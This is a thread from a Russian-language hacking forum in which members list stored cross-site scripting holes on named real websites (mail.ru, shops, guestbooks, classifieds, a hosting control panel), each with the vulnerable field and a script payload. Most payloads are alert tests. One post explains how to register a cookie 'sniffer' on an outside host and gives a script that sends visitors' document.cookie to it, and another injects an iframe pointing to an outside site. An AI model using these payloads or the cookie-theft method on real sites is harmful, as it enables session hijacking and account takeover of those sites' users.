Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.oops.ru/stat/se.php
    активная xss на официальном российском сайте популярного журнала OOPS
    описание тут:
    https://forum.antichat.ru/thread55136.html
     
    2 people like this.
  2. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.qr.ru/stat/se.php
    активная xss на официальном российском сайте популярного журнала Quattroruote
    описание тут:
    https://forum.antichat.ru/thread55136.html
     
  3. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Простенькая активка на My.mail.ru

    Заходим в раздел *Желания* ->>Добавить желание...
    Уязвимо поле *Метки* ...
    Пример
    Code:
    http://my.mail.ru/my/wishlist?wish=313616
    :) С Новым Годом) :)

    P.S Активка уже не работает....10 часов прожила) .ПРЕВЕД АДМИНАМ МАЙЛА..И ЛИЧНО ЗАКЕРУ.....Знаю ещё одну..но больше не надейтесь, что я тут выложу)
     
    #123 DimOnOID, 26 Dec 2007
    Last edited: 26 Dec 2007
    2 people like this.
  4. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    webfile.ru

    загружаем картинку\пдф\тхт файлы со скриптом. скрипт выполняется при открытии файла.
     
  5. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
  6. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145

    add

    сейчас пробовал отправлять файлы типов: jpg xml txt pdf, все прекрасно везде работает %)
     
    5 people like this.
  7. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    Я поставил и проверил - не работает. (в IE работает)
     
    2 people like this.
  8. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    www.todj.ua - главный клубный портал Украины
    В своем профиле, в разделе фото:
    topdj.ua/clubbers/ваш_id/photo/
    создаем новую галерею и в поле "название" вписываем js-код. Поле "клуб" вообще нигде не отображается, а "описание"- фильтруется.
    Found by: /me
     
    2 people like this.
  9. Dreel

    Dreel New Member

    Joined:
    23 Aug 2007
    Messages:
    1
    Likes Received:
    3
    Reputations:
    0
    Вот моя активная xss:
    _http://job.properm.ru/
    _http://auto.properm.ru/
    Заполняем вакансию, резюме, объявление, и в поле ФИО пишем
    Code:
    Иванов Иван <script>alert(/ xss /)</script>

    Заходим на сайт _http://www.virtualflowers.ru/abook.php
    Регестрируемся [ регистрация там фуфло какое-то ;) ]
    Добавить адресата - в каментах
    Code:
    <script>alert(/ Dreel /)</script>

    [​IMG]
    Бесплатные объявления Киева

    Заходим по адресу http://www.slando.com.ua и тыкаем кнопочку "подать объявление" продажа авто, уязвимо поле модель:
    <script>alert(/ D /)</script>
    Есть один недостаток - максимум 30 символов.
     
    2 people like this.
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    ero-club.ru
    В своем профиле давим "добавить новое фото" -
    создаем новый альбом и в поле"Название" пишем ядовитый код
    HTML:
    <script>alert(/iddqd/)</script>
     
    2 people like this.
  11. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    http://news.nag.ru/news/root/crnews/
    Уязвимы комментарии.
    Code:
    http://news.nag.ru/news/root/crnews/story15827/
     
    1 person likes this.
  12. SSSetuPPP

    SSSetuPPP Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    55
    Likes Received:
    4
    Reputations:
    0
    PHP:
    http://s.netsec.ru/
    регистрируй там сниффер
    PHP:
    http://s.netsec.ru/Твой_Логин.gif
    адрес твоего сниффера

    PHP:
    <a href="http://s.netsec.ru/Твой_Логин.gif?test">click me</a>
    вызов по ссылке

    PHP:
    <img src="http://s.netsec.ru/Твой_Логин.gif">
    код HTML

    PHP:
    <script>img = new Image(); img.src "http://s.netsec.ru/Твой_Логин.gif?"+document.cookie;</script>
    вызов из скрипта

    GreenBear
    Сниффер от netsec.ru
    http://forum.antichat.ru/thread36829-%F1%ED%E8%F4%F4%E5%F0.html
     
    #132 SSSetuPPP, 22 Jan 2008
    Last edited: 22 Jan 2008
  13. b!atnoy

    b!atnoy .::The Mafia::.

    Joined:
    1 Jan 2008
    Messages:
    96
    Likes Received:
    87
    Reputations:
    3
    Вбей в браузер вроде в Опере есть в настройках куда куки ставлять
     
  14. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    www.shinovozoff.ru - онлайн магазин авто-товаров

    http://www.shinovozoff.ru/guestbook/
    уязвимы все поля ввода, результат =)
     
    4 people like this.
  15. none222

    none222 Guest

    Reputations:
    0
    www.jino-net.ru

    у себя в контрольной панели в поле подсказка пароля пишешь:
    Code:
    <script>alert(document.cookie)</script>
    Затем идёшь восстанавливать пароль:
    www.jino-net.ru/lostpass.phtml?login=ЛОГИН
    и выскакивает алерт с куками
     
    1 person likes this.
  16. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    Code:
    gamer.kraslan.ru
    в поле комментов втыкаем

    Code:
    <iframe src= http://you-money.100webspace.net <
    рабочая версия

    Code:
    http://gamer.crownet.ru/index.php?name=Game&pa=preview_game&id=791
     
    #136 MaSter GeN, 3 Feb 2008
    Last edited: 3 Feb 2008
  17. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    auto05.ru

    Code:
    http://www.auto05.ru/guestbook.html?page=1
    Уязвимо поле комментариев.

    redyarsk.ru
    Code:
    http://www.redyarsk.ru/gb/index.php?t=1&all=
    Уязвимо поле комментариев.
     
    #137 Momiji, 6 Feb 2008
    Last edited: 6 Feb 2008
  18. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    уууу блин
    http://www.pressofatlanticcity.com

    постим коммент к новости

    Code:
    <IMG """><SCRIPT>alert("master gen")</SCRIPT>">
    получам
    рабочий вариант !
    http://www.pressofatlanticcity.com/188/story/84175.html
     
    1 person likes this.
  19. N1K70

    N1K70 Banned

    Joined:
    2 Jan 2008
    Messages:
    161
    Likes Received:
    76
    Reputations:
    21
    http://edsh.org/diskutime/post.php?action=edit&%20fid=24&tid=1172&pid=4303

    в заголовке (Subjekti) пишите:

    <script>alert(/n1k70/)</script>
     
    1 person likes this.
  20. Haruka

    Haruka Elder - Старейшина

    Joined:
    25 Jul 2007
    Messages:
    48
    Likes Received:
    5
    Reputations:
    -1
    Вот
    http://www.lugarus.com/users/haruka0000/
    Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе".
     
    1 person likes this.